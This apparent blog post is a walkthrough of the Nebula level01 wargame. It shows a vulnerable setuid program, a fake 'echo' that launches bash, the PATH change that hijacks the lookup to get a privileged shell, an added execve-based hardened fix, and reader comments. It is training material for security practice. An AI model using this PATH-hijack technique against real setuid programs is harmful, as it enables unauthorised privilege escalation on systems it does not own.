Tuesday 10 April 2012

exploit-exercises.com walkthrough - Nebula level01

Here's the vulnerable source code:
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
int main(int argc, char **argv, char **envp)
{
    gid_t gid;
    uid_t uid;
    gid = getegid();
    uid = geteuid();

    setresgid(gid, gid, gid);
    setresuid(uid, uid, uid);

    system("/usr/bin/env echo and now what?");
}

The binary is located at /home/flag01/flag01. When executed, it simply echoes the "and now what?" message. The call uses an absolute path to env, but env looks up echo through the PATH environment variable, which we control, so the echo that gets executed can be replaced. We'll do this by creating a simple C program in /home/level01:

#include <stdlib.h>
#include <stdio.h>

/* Stand-in for echo: starts a shell instead of printing its arguments */
int main(void)
{
    system("/bin/bash");
    return 0;
}

Now we need to compile it:
level01@nebula:~$ gcc -o echo 1.c
In the next step we alter the PATH variable with the following command:
level01@nebula:~$ PATH=/home/level01:$PATH
All we need to do now is run flag01.
level01 completed.

That's it!
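
The fix for the pattern exploited above, as an added example that is not part of the original post or of the Nebula sources: call the target by absolute path with execve() and hand the child a fixed environment, so neither a shell nor PATH is involved. The names run_trusted, demo_with_hostile_path and CLEAN_ENV are hypothetical, and the code assumes /bin/echo exists on the system.

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Fixed environment for the child; nothing is inherited from the caller. */
static char *const CLEAN_ENV[] = { "PATH=/usr/bin:/bin", NULL };

/* Run prog (absolute path only) with argv and CLEAN_ENV.
 * Returns the child's exit status, or -1 on refusal or failure. */
int run_trusted(const char *prog, char *const argv[])
{
    if (prog == NULL || prog[0] != '/')
        return -1;                      /* never resolve a bare name via PATH */

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(prog, argv, CLEAN_ENV);  /* no shell, no PATH search */
        _exit(127);                     /* only reached if exec failed */
    }

    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

/* Recreate the caller-controlled PATH from the walkthrough
 * (/home/level01 listed first) and make the hardened call anyway. */
int demo_with_hostile_path(void)
{
    char *const args[] = { "echo", "and now what?", NULL };

    setenv("PATH", "/home/level01:/usr/bin:/bin", 1);
    return run_trusted("/bin/echo", args);
}

int main(void)
{
    printf("exit status: %d\n", demo_with_hostile_path());
    printf("bare name refused: %d\n", run_trusted("echo", NULL));
    return 0;
}
```

system() itself runs the command through /bin/sh, so replacing only the env lookup while keeping system() would still leave the call dependent on the caller's environment.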

3 comments:

  1. I'm sorry to bother you, but could you explain why? How was echo altered? And what does the program you have created do?

  2. Sure, the echo command is issued insecurely by the system() function. We can alter the environment variable PATH so that when echo is called it will first look in the /home/level01 directory, where our simple program is located (the program I created simply executes bash). So instead of running /bin/echo it will run /home/level01/echo.

    1. Thank you very much for the explanation.